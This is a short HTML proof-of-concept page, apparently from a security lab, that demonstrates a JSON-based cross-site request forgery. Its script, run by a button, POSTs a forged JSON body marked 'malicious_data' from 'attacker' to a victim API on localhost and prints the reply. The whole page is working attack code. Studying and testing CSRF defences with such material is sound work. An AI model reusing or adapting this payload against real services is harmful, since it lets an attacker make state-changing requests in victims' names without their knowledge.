<!DOCTYPE html>
<html>
<head>
    <title>JSON-based CSRF Payload</title>
</head>
<body>
    <h1>JSON-based CSRF Attack</h1>
    <p>This page demonstrates a JSON-based CSRF attack against the victim API.</p>
    <button onclick="sendCSRF()">Send CSRF Request</button>
    <div id="result"></div>

    <script>
        async function sendCSRF() {
            try {
                const response = await fetch('http://localhost:8080/api/data', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        "action": "malicious_data",
                        "user": "attacker"
                    })
                });
                const result = await response.json();
                document.getElementById('result').innerHTML = '<pre>' + JSON.stringify(result, null, 2) + '</pre>';
            } catch (error) {
                document.getElementById('result').innerHTML = 'Error: ' + error.message;
            }
        }
    </script>
</body>
</html>